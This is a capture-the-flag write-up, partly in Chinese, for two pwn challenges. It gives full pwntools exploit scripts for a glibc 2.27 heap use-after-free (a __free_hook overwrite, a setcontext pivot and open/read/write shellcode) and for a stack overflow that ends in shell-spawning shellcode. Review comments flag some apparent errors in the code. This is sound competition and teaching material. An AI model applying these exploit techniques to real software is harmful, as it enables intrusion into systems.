the_Belt_and_Road_review


三个小时的理论+CTF,全打理论去了:(
一带一路初赛题目附件
orw_h1
checksec

└─$ checksec orw_h1
[*] '/Desktop/pwn/orw_h1'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled

sandbox

str1k3@ubuntu:~/Desktop$ seccomp-tools dump '/var/run/vmblock-fuse/blockdir/fTF0Ly/orw_h1' 
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x02 0xc000003e if (A != ARCH_X86_64) goto 0004
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x15 0x00 0x01 0x0000003b if (A != execve) goto 0005
0004: 0x06 0x00 0x00 0x00000000 return KILL
0005: 0x06 0x00 0x00 0x7fff0000 return ALLOW

delete存在UAF

/* Decompiled delete handler (excerpt).  v1 looks like the user-supplied index
 * and unk_202060 like a table of chunk pointers -- both inferred from usage.
 * Only an upper bound (v1 <= 0x1E) is visible; whether negative indices are
 * rejected depends on v1's declared type, which this excerpt does not show.
 * Nothing in this excerpt clears the table entry after free(), so the same
 * index can be freed, edited or shown again -- the use-after-free the
 * write-up relies on. */
if ( v1 <= 0x1E && *((_QWORD *)&unk_202060 + (int)v1) )
{
    free(*((void **)&unk_202060 + (int)v1)); /* pointer stays in the table */
    puts("delete done.");
}

glibc2.27

from pwn import *
#from LibcSearcher import*
from ctypes import *
from struct import pack
from pwn import u64,p64

# Exploit environment for the orw_h1 binary: amd64 Linux with verbose I/O logging.
context.update(arch='amd64', os='linux', log_level='debug')

# Candidate one_gadget offsets for this libc build; not referenced later in the script.
one_gadget = [0x4f2a5, 0x4f302, 0x10a2fc]

# Local process under test (the remote endpoint is left as a commented-out alternative).
p = process('./orw_h1')
#p = remote('106.15.38.114', 32832)

# Target binary and the matching libc (glibc 2.27) used for symbol lookups.
elf = ELF('./orw_h1')
libc = ELF('libc-2.27.so')

def debug():
    """Attach gdb to the live target and block until the user resumes."""
    gdb.attach(p)
    pause()

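def add(size, idx=''):
    """Menu option 1: allocate a game of *size* bytes with description *idx*.

    Despite its name, *idx* is the description text written into the new
    chunk.  The original declared it as required, yet the script calls
    ``add(128)`` and ``add(0x130)`` with a single argument, which raises
    TypeError; the empty-string default is a constructed guess at the
    intended behaviour (an empty description line is sent) -- confirm
    against the binary.  ``str(idx)`` only round-trips a bytes payload under
    Python 2, which the rest of the script appears to assume.
    """
    p.sendlineafter(b'>>', b'1')
    p.sendlineafter(b'description:', str(size))
    p.sendlineafter(b'Game description:', str(idx))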

def delete(idx):
    """Menu option 2: free the game at *idx* (the binary keeps the pointer)."""
    replies = (
        (b'>>', b'2'),
        (b'game index: ', str(idx)),
    )
    for prompt, answer in replies:
        p.sendlineafter(prompt, answer)

def edit(idx1, idx2):
    """Menu option 3: overwrite the description of game *idx1* with *idx2*.

    *idx2* is the new content rather than an index; the parameter names are
    the author's and are kept for compatibility.
    """
    replies = (
        (b'>>', b'3'),
        (b'game index: ', str(idx1)),
        (b'Game description:', str(idx2)),
    )
    for prompt, answer in replies:
        p.sendlineafter(prompt, answer)

def show(idx):
    """Menu option 4: print the description of game *idx*."""
    replies = (
        (b'>>', b'4'),
        (b'game index: ', str(idx)),
    )
    for prompt, answer in replies:
        p.sendlineafter(prompt, answer)

def exit():
    """Menu option 5: leave the program's menu loop.

    Shadows the ``exit`` builtin for the rest of this script; the name is
    kept because the rest of the write-up uses it.
    """
    prompt, answer = b'>>', b'5'
    p.sendlineafter(prompt, answer)

# Step 1: leak a libc address through the use-after-free in delete/show.
add(0x80,'aaaa') # idx0
add(0x130,'bbbb') # idx1
add(0x130,'bbbb') # idx2
# Seven same-sized chunks that are freed right below -- presumably to fill the
# tcache bin so that freeing chunk 0 afterwards lands elsewhere; TODO confirm.
for i in range(7):
    add(128)
for i in range(3, 10):
    delete(i)
# delete() leaves the table entry in place, so show(0) still reads the freed chunk.
delete(0)
show(0)

p.recv()
# 0x3ebca0 is the author's offset from the leaked pointer to the libc base for this build.
libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00')) - 0x3ebca0

free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
# NOTE(review): +53 is folded in here and added again in `payload` below -- confirm which is intended.
setcontext = libc_base + libc.sym['setcontext'] + 53

success("libc base:%s", hex(libc_base))
success("setcontext_53:%s", hex(setcontext))
success("free_hook:%s", hex(free_hook))

# Could not find a full gadget set, so this follows the official write-up:
# overwrite __free_hook and use setcontext to set up a memory region for the
# shellcode, which then performs open/read/write.

#pop_rax_ret = libc_base+0x0000000000043ae8
#pop_rdi_ret = libc_base+0x0000000000001193
#pop_rsi_ret = libc_base+0x0000000000023eea
#pop_rdx_ret = libc_base+0x0000000000001b96
#ret = libc_base+0x0000000000000909
#open1 = libc_base + libc.sym['open']
#read = libc_base + libc.sym['read']
#write = libc_base + libc.sym['write']
#alarm = libc_base + libc.sym['alarm']
#syscall = alarm+0x5
#flag_addr = heap_base+0x2000

# Page-aligned address derived from __free_hook; the region the stage-1 stub reads into.
newexe = free_hook & 0xffffffffff000

# Stage 1 stub: read(0, newexe, 0x1000) and jump to what was read
# (assembled when `payload` is built below).
shellcode1 = '''
xor rdi,rdi
mov rsi,%d
mov edx,0x1000

mov eax,0
syscall
jmp rsi
'''% newexe

# Forge the setcontext frame: registers for mprotect(newexe, 0x1000, 7).
frame = SigreturnFrame()
framersp = free_hook+0x10   # not referenced afterwards
frame.rdi = newexe
frame.rsi = 0x1000
frame.rdx = 7
# NOTE(review): unlike the other symbols above, no libc_base is added here -- confirm.
frame.rip = libc.sym['mprotect']

# Stage 2: an arbitrary open/read/write shellcode (the pushed bytes spell "flag").
shellcode2= asm('''
push 0x67616c66
mov rdi,rsp
xor esi,esi
push 2
pop rax
syscall
mov rdi,rax
mov rsi,rsp
mov edx,0x100
xor eax,eax
syscall
mov edi,1
mov rsi,rsp
push 1
pop rax
syscall
''')


# Chunk 1 is freed but still editable (UAF); its first qword is rewritten to __free_hook.
delete(1)
edit(1, p64(free_hook))
add(0x130)
payload = p64(setcontext+53)+p64(free_hook+0x18)*2+asm(shellcode1)
add(0x130, payload)
edit(2, str(frame))
# free() on chunk 2 now goes through the overwritten __free_hook.
delete(2)
p.sendline(shellcode2)
p.interactive()

pwn0402
啥都没开

└─$ checksec pwn0402
[*] '/Desktop/pwn0402'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments
/*
 * Decompiled main() of pwn0402 (decompiler output; the printf argument list
 * is an artefact of the decompilation).  Security-relevant points:
 *   - the address of the stack buffer v8 is printed to the client, which
 *     discloses the stack layout;
 *   - read() accepts up to 296 bytes into the 132-byte v8, a stack buffer
 *     overflow (no canary, NX disabled, no PIE according to the checksec
 *     output above);
 *   - the byte-blacklist loop calls exit(0) on a match, but the author
 *     states the check is not actually reached -- cannot be confirmed here.
 * init_0, length and nosecurity_string are defined elsewhere.
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
    int v3; // edx
    int v4; // ecx
    int v5; // r8d
    int v6; // r9d
    char v8[132]; // [rsp+0h] [rbp-90h] BYREF
    int v9; // [rsp+84h] [rbp-Ch]
    int i; // [rsp+88h] [rbp-8h]
    int j; // [rsp+8Ch] [rbp-4h]

    init_0();
    printf((unsigned int)"secret: %p\n", (unsigned int)v8, v3, v4, v5, v6, v8[0]); // leaks &v8
    length = read(0LL, v8, 296LL); // overflow: 296 bytes into a 132-byte buffer
    i = 0;
    v9 = strlen(nosecurity_string);
    for ( i = 0; i < length; ++i )
    {
        for ( j = 0; j < v9; ++j )
        {
            if ( nosecurity_string[j] == v8[i] )
                exit(0LL); // any blacklisted byte aborts the process
        }
    } // check: filters the characters 'CTctGFlagSNH/binsh' (per the author)
    return 0;
}

根本不走检查:)

from pwn import *
#from LibcSearcher import*
from ctypes import *
from struct import pack
from pwn import u64,p64

# Exploit environment for pwn0402 (amd64 Linux, verbose I/O logging).
context(arch = 'amd64', os = 'linux', log_level = 'debug')

p = process('./pwn0402')
main = 0x400A05  # address of main; not referenced afterwards

p.recvuntil('secret: ')
data = int(p.recvline(),16) # the binary prints the address of its stack buffer (the overflow point)
# Static gadget addresses: the binary has no PIE, so they do not move.
rdx_rsi = 0x0000000000442b89 # pop rdx ; pop rsi ; ret
pop_rdi = 0x00000000004016e6
# Debugging aid left in: breaks at 0x0400ABF and waits for the user before anything is sent.
gdb.attach(p,'b *0x0400ABF')
pause()

success("v8:%s", hex(data))


# Overflow padding: 0x98 = 0x90 (v8 to rbp) + 8 (saved rbp), reaching the saved return address.
payload = b''.ljust(0x98,b'\x90')
payload += p64(rdx_rsi)
payload += p64(0x100) + p64(data + 200) # == read(0, data+200, 0x100)
payload += p64(pop_rdi)
payload += p64(0)
payload += p64(0x0412ECB) # call_read
p.sendline(payload)

#gdb.attach(p)
#pause()
# The ROP chain's read() is now waiting for input; this second send is what it
# receives, writing the shellcode onto the stack -- which is executable (NX disabled).
p.sendline(p64(data+210)+b'\x90'*20+asm(shellcraft.sh()))